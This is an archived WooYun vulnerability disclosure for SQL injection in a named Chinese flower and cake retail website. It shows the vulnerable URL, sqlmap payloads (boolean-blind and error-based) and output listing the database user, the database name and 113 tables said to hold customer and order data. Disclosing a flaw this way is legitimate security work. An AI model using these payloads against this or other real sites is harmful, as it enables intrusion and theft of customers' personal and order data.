乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-17: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-01: 厂商已经主动忽略漏洞,细节向公众公开
- -我要给女票买花
注入点:
http://www.salala.com.cn/cakesearch.php?ptype=FO&cake=67
数据库用户:
---Parameter: cake (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ptype=FO&cake=67 AND 4282=4282 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ptype=FO&cake=67 AND (SELECT 5547 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(5547=5547,1))),0x716a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---[11:00:30] [INFO] the back-end DBMS is MySQLweb application technology: Apache, PHP 5.2.17back-end DBMS: MySQL 5.0[11:00:30] [INFO] fetching current user[11:00:31] [WARNING] unknown web page charset 'db2312'. Please report by e-mailto '[email protected]'[11:00:31] [INFO] heuristics detected web page charset 'GB2312'[11:00:31] [WARNING] reflective value(s) found and filtering out[11:00:31] [INFO] retrieved: [email protected]current user: '[email protected]'
数据库
---Parameter: cake (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ptype=FO&cake=67 AND 4282=4282 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ptype=FO&cake=67 AND (SELECT 5547 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(5547=5547,1))),0x716a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---[11:04:41] [INFO] the back-end DBMS is MySQLweb application technology: Apache, PHP 5.2.17back-end DBMS: MySQL 5.0[11:04:41] [INFO] fetching current database[11:04:41] [WARNING] unknown web page charset 'db2312'. Please report by e-mailto '[email protected]'[11:04:41] [INFO] heuristics detected web page charset 'GB2312'[11:04:41] [WARNING] reflective value(s) found and filtering out[11:04:41] [INFO] retrieved: newsalalacurrent database: 'newsalala'
数据表
Database: newsalala[113 tables]+-----------------------------+| am_account || am_account_dummy || am_balance_log || am_bank_name || am_hj || am_limit_used || am_payment || am_points_log || cm_customer || cm_customer_basket || cm_customer_complaint || cm_customer_dummy || cm_customer_favorites || cm_customer_friends || cm_customer_grade || cm_customer_mail || cm_customer_receipt || cm_customer_reminder || cm_customer_type || cm_liuyan || festival_man || festival_product || friendlylink || im_coupon || im_coupon_log || im_coupon_other || im_membership_card || im_membership_card_type || im_rechargeable_card || im_rechargeable_card_type || im_sale_card || im_sale_log || im_sales || im_yintai || mm_coupon_cooperation || mm_enterprise_staff || om_baobiao || om_baobiao_update || om_baobiao_update_log || om_flowery_log || om_lakala_log || om_note || om_order || om_order_auto || om_order_delivery || om_order_delivery_log || om_order_insert_log || om_order_log || om_zhifu || pm_attribute || pm_baike || pm_class_attribute || pm_component || pm_component_type || pm_county || pm_delivery_area || pm_delivery_option || pm_price_alter || pm_price_factor || pm_product || pm_product_attribute || pm_product_bak || pm_product_class || pm_product_class_bak || pm_product_components || pm_product_dakehu || pm_product_delivery || pm_product_present || pm_product_price_log || pm_product_priceplan || pm_product_priceplan_bak || pm_product_qiangpai || pm_product_tuijian || print_setting || prm_agent || prm_channel || prm_channels_banner || prm_channels_recommend || prm_channels_report || prm_channels_settle_history || prm_channels_union_accounts || prm_channels_union_notice || prm_channels_union_suggest || prm_channels_union_urls || prm_provider || prm_source || report_0812 || sm_area || sm_bulletin || sm_doc || sm_docclass || sm_docsubclass || sm_mail || sm_map || sm_menu || sm_menuchild || sm_permission || sm_shouye || sm_sysinfo || sm_uggroups || sm_ugmembers || sm_ugrights || sm_user || sm_usergroup || sm_userlog || sm_userrole || sm_usertype || tbl_session || v_big_customer || v_order_report || v_order_with_source || v_product_with_class || zhuanti |+-----------------------------+
用户信息和订单信息都在表里……
如上
过滤
未能联系到厂商或者厂商积极拒绝